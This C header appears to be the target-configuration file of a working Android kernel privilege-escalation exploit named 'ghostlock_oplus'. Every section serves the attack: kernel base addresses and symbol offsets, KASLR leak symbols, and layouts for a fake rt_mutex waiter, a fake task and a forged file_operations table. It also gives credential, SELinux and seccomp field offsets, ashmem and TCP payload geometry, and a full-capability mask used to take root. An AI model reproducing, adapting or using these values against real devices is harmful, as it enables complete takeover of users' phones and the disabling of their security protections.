#ifndef TARGET_H
#define TARGET_H

#define BUILD_VARIANT_LABEL "ghostlock_oplus"

/* Kernel address layout. _text on every supported image (kallsyms-verified
 * houji; the old 0xffffffc080000000 was wrong but cancelled out in
 * alias math — the cfi text pointers below need the true base). */
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define MTK_VADDR_BASE 0xffffffc000000000ULL
#define P0_PAGE_OFFSET 0xffffff8000000000ULL
#define P0_PHYS_OFFSET 0x80000000ULL
#define P0_KERNEL_PHYS_LOAD 0xa8000000ULL
#define XRING_KERNEL_PHYS_LOAD 0x80200000ULL
#define KERNELSNITCH_IDENTITY_START 0xffffff8000000000ULL
#define KERNELSNITCH_IDENTITY_END 0xffffff8c00000000ULL
#define DIRECT_MAP_BASE 0xffffff8000000000ULL
#define DIRECT_MAP_END 0xffffff9000000000ULL
#define VMEMMAP_START 0xfffffffe00000000ULL

/* Symbol offsets. */
#define INIT_TASK_OFF 0x0211e280ULL
#define INIT_CRED_OFF 0x02130748ULL
#define ROOT_TASK_GROUP_OFF 0x02317580ULL
#define SELINUX_ENFORCING_OFF 0x02358ee0ULL
#define SELINUX_BLOB_SIZES_OFF 0x0167b5d0ULL
#define SECURITY_HOOK_HEADS_OFF 0x00000000ULL

/* KASLR leak symbols. */
#define SLIDE_NFULNL_LOGGER_OFF 0x02112260ULL
#define SLIDE_LOGGERS_0_1_OFF 0x021121b0ULL
#define SLIDE_RANDOM_BOOT_ID_DATA_OFF 0x02379ed8ULL
#define SLIDE_SYSCTL_BOOTID_OFF 0x02379ed8ULL

/* Kernel addresses. */
#define INIT_TASK (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define INIT_CRED (KIMAGE_TEXT_BASE + INIT_CRED_OFF)
#define ROOT_TASK_GROUP (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SELINUX_ENFORCING (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)
#define SELINUX_BLOB_SIZES (KIMAGE_TEXT_BASE + SELINUX_BLOB_SIZES_OFF)
#define SECURITY_HOOK_HEADS (KIMAGE_TEXT_BASE + SECURITY_HOOK_HEADS_OFF)
#define SLIDE_NFULNL_LOGGER_IMAGE (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OFF)
#define SLIDE_LOGGERS_0_1_IMAGE (KIMAGE_TEXT_BASE + SLIDE_LOGGERS_0_1_OFF)
#define SLIDE_RANDOM_BOOT_ID_DATA_IMAGE (KIMAGE_TEXT_BASE + SLIDE_RANDOM_BOOT_ID_DATA_OFF)
#define SLIDE_INIT_TASK_IMAGE (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define SLIDE_ROOT_TASK_GROUP_IMAGE (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SLIDE_SYSCTL_BOOTID_IMAGE (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)

#define PSELECT_WAITER_WORD_SHIFT -2

/* Fake waiter and task layouts. */
#define FAKE_WAITER_TREE_PRIO_OFF 0x18
#define FAKE_WAITER_TREE_DEADLINE_OFF 0x20
#define FAKE_WAITER_PI_TREE_ENTRY_OFF 0x28
#define FAKE_WAITER_PI_TREE_PRIO_OFF 0x40
#define FAKE_WAITER_PI_TREE_DEADLINE_OFF 0x48
#define FAKE_WAITER_TASK_OFF 0x50
#define FAKE_WAITER_LOCK_OFF 0x58
#define FAKE_WAITER_WAKE_STATE_OFF 0x60
#define FAKE_WAITER_WW_CTX_OFF 0x68

#define FAKE_TASK_USAGE_OFF 0x40
#define FAKE_TASK_PRIO_OFF 0x84
#define FAKE_TASK_NORMAL_PRIO_OFF 0x8c
#define FAKE_TASK_TASK_GROUP_OFF 0x348
#define FAKE_TASK_PI_LOCK_OFF 0x90c
#define FAKE_TASK_PI_WAITERS_OFF 0x920
#define FAKE_TASK_PI_TOP_TASK_OFF 0x930
#define FAKE_TASK_PI_BLOCKED_ON_OFF 0x938

#define TASK_PID_OFF 0x618
#define TASK_TGID_OFF 0x61c
#define TASK_ATOMIC_FLAGS_OFF 0x5d8
#define TASK_REAL_CRED_OFF 0x818
#define TASK_CRED_OFF 0x820
#define TASK_COMM_OFF 0x830
#define TASK_TASKS_OFF 0x550
#define TASK_THREAD_INFO_FLAGS_OFF 0x00
#define TASK_SECCOMP_OFF 0x8e8

#define CRED_UID_OFF 8
#define CRED_SECUREBITS_OFF 40
#define CRED_CAPS_OFF 48
#define CRED_SECURITY_OFF 128
#define SELINUX_CRED_BLOB_OFF 0
#define SELINUX_CRED_OSID_OFF 0
#define SELINUX_CRED_SID_OFF 4
#define SECCOMP_MODE_OFF 0x00
#define SECCOMP_FILTER_COUNT_OFF 0x04
#define SECCOMP_FILTER_OFF 0x08
#define TIF_SECCOMP_BIT 11
#define PFA_NO_NEW_PRIVS_BIT 0

#define STRUCT_PAGE_SIZE 0x40
#define STRUCT_PAGE_COMPOUND_HEAD_OFF 0x08
#define STRUCT_SLAB_CACHE_OFF 0x08
#define STRUCT_PAGE_TYPE_OFF 0x30

#define LOCK_OFF 0x0E80
#define W0_OFF 0x1180
#define FOPS_OFF 0x0F80
#define RIGHT_OFF 0x1240
#define LEFT_OFF 0x1260
#define FAKE_TASK_OFF 0x1280

/* W2 payload. */
#define CRED_COPY_OFF 0x1080

/* TCP zerocopy route payload geometry (rmp src/61/util.c
 * MAIN_TCP_PAYLOAD): chunk bias 0xe80 and delta 0 live in util.c; these
 * are the in-chunk offsets that differ from the pselect layout.
 * fake_task 0x5800 is the rmp-proven value (avoids the fake_lock
 * rb_leftmost misalignment). */
#define TCP_FAKE_TASK_OFF 0x5800
#define TCP_LOCK_OFF 0x1350
#define TCP_W0_OFF 0x2220
#define TCP_SCRATCH_OFF 0x3000
#define TCP_FAKE_FOPS_OFF 0x3338

/* cfi/configfs write layer symbol fallbacks: 0 = entry has no values,
 * tcp route disabled at runtime (pselect fallback). */
#define NOOP_LLSEEK_OFF 0ULL
#define CONFIGFS_READ_ITER_OFF 0ULL
#define CONFIGFS_BIN_WRITE_ITER_OFF 0ULL
#define ASHMEM_IOCTL_OFF 0ULL
#define ASHMEM_FOPS_OFF 0ULL
#define ASHMEM_MISC_FOPS_OFF 0ULL

/* struct file_operations slots the fake table fills; 6.1 layout. */
#define FOPS_OWNER_OFF 0x00
#define FOPS_LLSEEK_OFF 0x08
#define FOPS_READ_ITER_OFF 0x20
#define FOPS_WRITE_ITER_OFF 0x28
#define FOPS_IOCTL_OFF 0x50

/* configfs_buffer fields reachable through the planted ashmem name blob
 * (rmp CFG_* offsets; name prefix is 11 bytes into the same buffer). */
#define CFG_PAGE_OFF 16
#define CFG_NEEDS_READ_FILL_OFF 80
#define CFG_BIN_BUFFER_OFF 88
#define CFG_BIN_BUFFER_SIZE_OFF 96
#define CFG_CB_MAX_SIZE_OFF 100

/* ashmem uapi (bionic linux/ashmem.h): ASHMEM_SET_NAME = _IOW(0x77,1,char[256]). */
#define __ASHMEMIOC 0x77
#define ASHMEM_NAME_LEN 256
#define ASHMEM_SET_NAME 0x40774100u
#define ASHMEM_NAME_PREFIX_LEN 11
#define ASHMEM_PREFIX_COUNT 0x6d6873612f766564ULL /* "/dev/ashmem" */

#define SELINUX_KERNEL_SID 1
#define CAP_FULL 0x000001ffffffffffULL
#define CRED_CAP_WORDS 5
#define TCP_FAKE_WAITER_PRIO 130

#endif
